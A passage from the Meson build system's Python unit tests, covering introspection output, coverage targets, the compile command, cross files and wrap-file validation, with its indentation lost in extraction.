if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
dummydir = os.path.join(testdir, 'dummydir.h')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
self.assertNotIn(dummydir, out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_buildoptions_cross_only(self):
testdir = os.path.join(self.unit_test_dir, '83 cross only introspect')
testfile = os.path.join(testdir, 'meson.build')
res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
optnames = [o['name'] for o in res]
self.assertIn('c_args', optnames)
self.assertNotIn('build.c_args', optnames)
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj, strict: bool = True):
for i in key_type_list:
if isinstance(i[1], (list, tuple)) and None in i[1]:
i = (i[0], tuple([x for x in i[1] if x is not None]))
if i[0] not in obj or obj[i[0]] is None:
continue
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
if strict:
for k in obj.keys():
found = False
for i in key_type_list:
if k == i[0]:
found = True
break
self.assertTrue(found, 'Key "{}" not in expected list'.format(k))
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
('depends', list),
('workdir', (str, None)),
('priority', int),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
('choices', (list, None)),
('value', (str, int, bool, list)),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('extra_files', list),
('subproject', (str, None)),
('install_filename', (list, None)),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Match target ids to input and output files for ease of reference
src_to_id = {}
out_to_id = {}
for i in res['targets']:
print(json.dump(i, sys.stdout))
out_to_id.update({os.path.relpath(out, self.builddir): i['id']
for out in i['filename']})
for group in i['target_sources']:
src_to_id.update({os.path.relpath(src, testdir): i['id']
for src in group['sources']})
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
deps_to_find = {'test case 1': [src_to_id['t1.cpp']],
'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']],
'benchmark 1': [out_to_id['file2'], src_to_id['t3.cpp']]}
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertEqual(sorted(i['depends']),
sorted(deps_to_find[i['name']]))
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i, strict=False)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
res_wb = [i for i in res_wb if i['type'] != 'custom']
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
def accept_node(json_node):
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '73 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Plugins
long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return '{}.exe'.format(basename)
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return 'lib{}.dll'.format(basename)
elif is_windows():
return '{}.dll'.format(basename)
elif is_cygwin():
return 'cyg{}.dll'.format(basename)
elif is_osx():
return 'lib{}.dylib'.format(basename)
else:
return 'lib{}.so'.format(basename)
def get_static_lib_name(basename: str) -> str:
return 'lib{}.a'.format(basename)
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
# Check that we have a shared lib, but not an executable, i.e. check that target actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
# Target specified in a project with non unique names
testdir = os.path.join(self.common_test_dir, '190 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# Explicitly clean the target through msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '75 dep files')
# Regression test: Spurious reconfigure was happening when build
# directory is inside source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but is inside build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '213 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '44 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '232 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown_dynamic/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = set(k for k,v in md_command_sections.items())
help_output = self._run(self.meson_command + ['--help'])
help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))
self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))
## Validate that each section has proper placeholders
def get_data_pattern(command):
return re.compile(
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'usage\'\] }}[\r\n]'
r'^```[\r\n]'
r'.*?'
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'arguments\'\] }}[\r\n]'
r'^```',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))
def _check_coverage_files(self, types=('text', 'xml', 'html')):
covdir = Path(self.builddir) / 'meson-logs'
files = []
if 'text' in types:
files.append('coverage.txt')
if 'xml' in types:
files.append('coverage.xml')
if 'html' in types:
files.append('coveragereport/index.html')
for f in files:
self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f))
def test_coverage(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '109 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
self._check_coverage_files(['html'])
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
self._check_coverage_files(['text'])
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
self._check_coverage_files(['xml'])
def test_cross_file_constants(self):
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '81 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
def test_multi_output_custom_target_no_warning(self):
testdir = os.path.join(self.common_test_dir, '235 custom_target source')
out = self.init(testdir)
self.assertNotRegex(out, 'WARNING:.*Using the first one.')
self.build()
self.run_tests()
@unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners')
def test_nostdlib(self):
testdir = os.path.join(self.unit_test_dir, '79 nostdlib')
machinefile = os.path.join(self.builddir, 'machine.txt')
with open(machinefile, 'w') as f:
f.write(textwrap.dedent('''
[properties]
c_stdlib = 'mylibc'
'''))
# Test native C stdlib
self.meson_native_file = machinefile
self.init(testdir)
self.build()
# Test cross C stdlib
self.new_builddir()
self.meson_native_file = None
self.meson_cross_file = machinefile
self.init(testdir)
self.build()
def test_meson_version_compare(self):
testdir = os.path.join(self.unit_test_dir, '82 meson version compare')
out = self.init(testdir)
self.assertNotRegex(out, r'WARNING')
def test_wrap_redirect(self):
redirect_wrap = os.path.join(self.builddir, 'redirect.wrap')
real_wrap = os.path.join(self.builddir, 'foo/subprojects/real.wrap')
os.makedirs(os.path.dirname(real_wrap))
# Invalid redirect, filename must have .wrap extension
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/subprojects/real.wrapper
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be a .wrap file'):
PackageDefinition(redirect_wrap)
# Invalid redirect, filename cannot be in parent directory
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = ../real.wrap
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename cannot contain ".."'):
PackageDefinition(redirect_wrap)
# Invalid redirect, filename must be in foo/subprojects/real.wrap
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/real.wrap
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be in the form foo/subprojects/bar.wrap'):
wrap = PackageDefinition(redirect_wrap)
# Correct redirect
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/subprojects/real.wrap
'''))
with open(real_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = http://invalid
'''))
wrap = PackageDefinition(redirect_wrap)
self.assertEqual(wrap.get('url'), 'http://invalid')
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
